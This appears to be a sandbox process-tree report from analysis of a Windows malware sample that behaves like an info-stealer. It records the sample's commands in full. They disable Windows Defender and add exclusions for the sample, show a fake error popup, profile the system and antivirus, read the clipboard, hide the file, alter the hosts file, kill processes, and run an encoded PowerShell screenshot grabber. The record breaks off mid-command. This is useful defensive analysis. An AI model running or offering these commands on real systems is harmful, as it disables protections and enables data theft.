  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=5518480136029469439 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --field-trial-handle=6896,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=6884 /prefetch:1
      4⤵
      PID:5324
  - - C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
      "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=5518480136029469439 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --field-trial-handle=6216,i,6590573628858096860,11984051588931825551,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=7236 /prefetch:1
      4⤵
      PID:2516

C:\Program Files\BraveSoftware\Brave-Browser\Application\131.1.73.104\elevation_service.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\131.1.73.104\elevation_service.exe"
1⤵
- Executes dropped EXE
PID:1428

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3036

C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe
"C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe" /c
1⤵
- System Location Discovery: System Language Discovery
PID:5472
- C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe
  "C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe" /cr
  2⤵
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:5584
- C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\BraveCrashHandler.exe
  "C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\BraveCrashHandler.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5608
- C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\BraveCrashHandler64.exe
  "C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\BraveCrashHandler64.exe"
  2⤵
  PID:5624
- C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe
  "C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe" /ua /installsource core
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5640

C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe
"C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe" /ua /installsource scheduler
1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5568

C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe
"C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe" /svc
1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1148

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:1180

C:\Users\Admin\Desktop\79041d419f813d07403d5ea0e190c09f63c0e9339bcf225b4588388de34aaa88.exe
"C:\Users\Admin\Desktop\79041d419f813d07403d5ea0e190c09f63c0e9339bcf225b4588388de34aaa88.exe"
1⤵
PID:5652
- C:\Users\Admin\Desktop\79041d419f813d07403d5ea0e190c09f63c0e9339bcf225b4588388de34aaa88.exe
  "C:\Users\Admin\Desktop\79041d419f813d07403d5ea0e190c09f63c0e9339bcf225b4588388de34aaa88.exe"
  2⤵
  - Drops file in Drivers directory
  PID:5492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\79041d419f813d07403d5ea0e190c09f63c0e9339bcf225b4588388de34aaa88.exe'"
    3⤵
    PID:5680
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\79041d419f813d07403d5ea0e190c09f63c0e9339bcf225b4588388de34aaa88.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    PID:5756
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cannot run with your windows version', 0, 'Error', 0+16);close()""
    3⤵
    PID:5720
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cannot run with your windows version', 0, 'Error', 0+16);close()"
      4⤵
      PID:2976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:916
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:5952
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:6108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    PID:4920
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:5268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    PID:1280
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:4088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1308
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:5856
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Desktop\79041d419f813d07403d5ea0e190c09f63c0e9339bcf225b4588388de34aaa88.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    PID:5716
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\Desktop\79041d419f813d07403d5ea0e190c09f63c0e9339bcf225b4588388de34aaa88.exe"
      4⤵
      Views/modifies file attributes
      PID:6032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    3⤵
    PID:5452
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1124
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4840
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:6008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:800
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:3176
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:6032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:5132
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1096
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3960
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:5072
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:5756
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:4920
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2648
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l0bp1tx2\l0bp1tx2.cmdline"
        5⤵
        
        PID:4416
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE879.tmp" "c:\Users\Admin\AppData\Local\Temp\l0bp1tx2\CSCA7E3774EAE8E490C8921436D4B4AA9E9.TMP"
        6⤵
        
        PID:5268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:5312
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:5564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:364
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4312
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:72
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:6024
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:5764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5680
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3132
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5640
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4312
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:6024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5656
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4276"
    3⤵
    PID:5680
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4320
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4276
      4⤵
      Kills process with taskkill
      PID:4124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4244"
    3⤵
    PID:2520
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4244
      4⤵
      Kills process with taskkill
      PID:5836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 224"
    3⤵
    PID:5536
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 224
      4⤵
      Kills process with taskkill
      PID:4424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 224"
    3⤵
    PID:5268
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 224
      4⤵
      Kills process with taskkill
      PID:4064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4148"
    3⤵
    PID:5616
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4148
      4⤵
      Kills process with taskkill
      PID:5540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1868"
    3⤵
    PID:6124
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1868
      4⤵
      Kills process with taskkill
      PID:1308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1948"
